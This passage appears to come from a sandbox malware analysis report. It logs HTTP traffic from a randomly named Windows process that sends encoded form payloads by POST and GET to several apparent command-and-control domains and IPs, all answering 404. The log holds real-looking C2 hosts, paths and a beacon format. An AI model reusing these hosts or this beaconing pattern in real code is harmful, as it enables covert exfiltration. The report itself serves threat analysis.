                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuQ28zMlLhMf3STm%2FMgDZeBJc9XsH%2FfielDLeo4BCnHRgJVxGlnr%2BqzxCP2Im0gIxfNdYK2obgH4D2zlo1fy6cOervsCJjbNi0rPO84zwaYTJh%2FKVfBOS3PfngqJmzt2cCrhE1wwEEY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2c369bf4267-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1780&rtt_var=890&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                14 | 192.168.2.5 | 49910 | 104.21.90.137 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:05.335757017 CET | 810 | OUT | POST /eaqq/ HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEwZQmb7Mtfis1cTQcdPDfAgQkGwJVhIMMr3uSlnFUUWTJCMa6lDcaqdTyTlcSKqVPoITWIdYiec8MSJN+NrRTn8fIIxWtzuIDejRwL/0uw2JKFh2ZQzmGcbthZCYEbY8IxfnX0U422vQi2NgnBJeUjgnLDCb0FAxwCkfTG3y+XDXa1PCH7h
                                                                                Dec 3, 2024 14:15:06.530419111 CET | 906 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yifU1v40o8fTdV3Zs3b2P18PDLNEYrPvB1HG9X%2Bsh65KhXdIVf1JAMPakORvKENE31iZi%2F4WK7bRjF3mcAogXTNRFHMhLwlujyVMQ2fM6Be%2FYXl%2B9NPV%2BP5tR7hsh9JIa0%2Fi6DJbodg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2d469414411-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1728&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                15 | 192.168.2.5 | 49916 | 104.21.90.137 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:08.013103008 CET | 1827 | OUT | POST /eaqq/ HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:09.258505106 CET | 907 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HK5PlL1RGfY4E7sUlYpbS8mm%2F%2B5sbTATUBxuHpfZzg%2BdQ%2FpYwrZN94UrhpzbOxp%2FTeZ1BDKKUbBlqkz4GPn1fd7%2B06eOWk4oV6Zl1gE2HKRZlwkAIPSWFdtjhpIcFK4TiKFZoHwNNeg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2e5495f17a9-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1628&rtt_var=814&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 190


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                16 | 192.168.2.5 | 49923 | 104.21.90.137 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:10.676479101 CET | 525 | OUT | GET /eaqq/?dfxXf=5pgPlrExEj&PLpD=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kXPn7ceVjctqreHfWNCCIV/k5akwvaRS8zM+YQ4ALen/wBg== HTTP/1.1
                                                                                Host: www.ana-silverco.shop
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:11.930099010 CET | 843 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cz28Kz1C0Xnmh7a42Hr1UnohzWD%2F4VS7HIqhfRUUgycNlUyhoU27WE%2BTysB9dd02Ent4QYVg3guDvN4bVHerodzHsAVjZpAczdqmfZy7JR3gA3NeuRPYW25Q5bpT75ggWLz8Zo7vwdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3d2f60e1841bd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=525&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                17 | 192.168.2.5 | 49939 | 209.74.77.107 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:17.545638084 CET | 778 | OUT | POST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=lNO/w16Uo72uJYAJFTGVDDeT67fF6HKlxY0W5k5anAVOObN32IUMCtqJZbmTIYtPoE2MqqehOBniRmXRfuZmp0qMi1k+B3ZgDt6MhCamELGKKXtESn30LJsIYGuCSJFj4t7hyi1nurJZYwCLOP4qLd+Lfw/dHVgNGSrqW49/CHQIRdYx38+i07FeURgv2yQIwxaacZE=
                                                                                Dec 3, 2024 14:15:18.822029114 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:18 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                18 | 192.168.2.5 | 49945 | 209.74.77.107 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:20.214359045 CET | 798 | OUT | POST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyBOO5F31M4MMNqJS7mWG4tEoE6Eqv2hOAHiRibRfZNlvkqSpVk4PXZgDt6MhBmMEI2KJn9ETDrzVZsHbGuCWJEk4t7Pyj4vupxZY1mLNbMtFd+NQQ+fD0xCDjanXZ04dRQUZLpbte2KnbpmECoYnCxhqSKqCOSmtLGjXchgZ7bBITFV7EOD
                                                                                Dec 3, 2024 14:15:21.465904951 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:21 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                19 | 192.168.2.5 | 49952 | 209.74.77.107 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:22.890433073 CET | 1815 | OUT | POST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:23.148901939 CET | 1236 | OUT |
                                                                                Data Ascii: lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyZOOKd3zd4MNNqJOLmXG4tFoEiAqvyxOE3iQHHRZthlhkqSm1k9B3ZPDsWAhB2MEI2KJl1EUX3zXZsIYGueSJFD4tj5yj8/ua5ZYV2LMoktNd+PTQ+9D08CDjHUXZAedWcUJvsg9NKJ+oJ2HCZ5lHZTrBOjevuCloujBMJ9Tay4UnZ2ywnrXcBH0cW6ix8zJ1pmCbzK2Av
                                                                                Dec 3, 2024 14:15:23.523921013 CET | 1236 | OUT | POST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:23.844048977 CET | 579 | OUT |
                                                                                Data Ascii: G1GfNqf6LE9XnyV35c1rieFh0cgG0ROiPPgZ5p0qQoFLn4+pGXyg7dz/fsZ/Pa9ij76ggsK77RMpkROrPQpJooMHzuTP2YtbfXmQzH90LlgtRZkyOBXfWn+PY0WI3kZ1vNeKS4gFfcSdadHmzy+Qr1vDPYcbWWy82iXDh/Fw/ywoJBzzE++hBaQnjGVQ3MivoK6307EktZ7C1TnwrB1n9hJTsQQ/Q1j/dEauM18dISwC57yFnP+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                20 | 192.168.2.5 | 49958 | 209.74.77.107 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:25.548809052 CET | 521 | OUT | GET /8q8w/?PLpD=oPmfzDvAiIeWP+dhDQf7HSaIzNrTwSyGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8okB+i6TciPkxAVomi9Bq2BL+qGFtNXm3IZasYXFTCdN4piQ==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:26.767414093 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                21 | 192.168.2.5 | 49974 | 176.32.38.130 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:32.334563971 CET | 793 | OUT | POST /j1io/ HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=L4AT1gMVwKs2qCJ63FTTXIsq0UVgxwwe1G7UyKvztjXcsj8GOF1bsPVDnNedzKMy+6GTDl1eaHsuXiUN1ljjb1SJs+OXNTiADb5QTnL4+XUaaLSLvIgAKAejFthhklvU4rHRSN7kDKuo8NJCAFSzoapiopwvGsLGSPrIJ5wOd74hIbEuOq6AxtmuWps2zXpoAM2ArHs=
                                                                                Dec 3, 2024 14:15:33.635622978 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                22 | 192.168.2.5 | 49980 | 176.32.38.130 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:34.991055012 CET | 813 | OUT | POST /j1io/ HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=L4AT1gMVwKs24y56k0TTSosp3UVg7QwS1GnUyPPjtRDcsH4GI01bvPVDz9eY9qM9+6KhDnheaHouXnoN1yfgBFSLkeOJJTiADb5QTnfS+R8aa/uLtpgHWwesGthhvFvQ4rHnSPPCDMqo8M5CDUSsxqp4spx6Gu2VUfzSC6pbcqxeAN1EUIyoiNKWG6kBinIBavmw1Q5lyyxm2cd67DM2aHj8peZ7
                                                                                Dec 3, 2024 14:15:36.346638918 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:36 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                23 | 192.168.2.5 | 49987 | 176.32.38.130 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:37.649564028 CET | 1830 | OUT | POST /j1io/ HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:39.006740093 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                24 | 192.168.2.5 | 49993 | 176.32.38.130 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:40.317555904 CET | 526 | OUT | GET /j1io/?dfxXf=5pgPlrExEj&PLpD=G6oz2WtW4adnoUNHm0mpcP4B2HtbwCYrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSataAi40vaJPFabO5lnHnDp1UEVdOTWmoEEbAO8Jrg/lBqLiQ== HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:41.724189043 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                25 | 192.168.2.5 | 50006 | 161.97.168.245 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:47.550465107 CET | 784 | OUT | POST /qrcg/ HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=4dinBSmmsZTW8vuF4XCpd+e+3f1MF9KC6fv2ScyfFssD5Pto44kk+GRnBTTsCBr2stDhtCpPntOTuGEhdABIP9yyLb7qng3KVFFKdAU8p3qH4beeYXT7DXmOm3W2yYKM69HjrwMp4veWeqk+eKA0dUhQm29eF77bp6SFWtXxTSZsL3qqKPprsB5fFTa2/CzzxIpiSFI=
                                                                                Dec 3, 2024 14:15:48.792321920 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:48 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: W/"66cd104a-b96"
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                26 | 192.168.2.5 | 50007 | 161.97.168.245 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:50.212371111 CET | 804 | OUT | POST /qrcg/ HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=4dinBSmmsZTW9O+F+wWpfee/5/1MOdLL6fj2SYixF+4D4rhoqswkzmRnODTtPhq6stPftHJPnuyTuD4hdzpLddy0D77sjg3KVFFKdAACp3iH7queXWT6O3mJl3W24IKX69HVrxQP4smWeug+fbA3KkhSoW8aNp+Ip8GbbLWDEktMHhbAQthD/hVnVASBuySarr5SMScF/NufsDHUFMrPIez1tgQB
                                                                                Dec 3, 2024 14:15:51.495095015 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:51 GMT
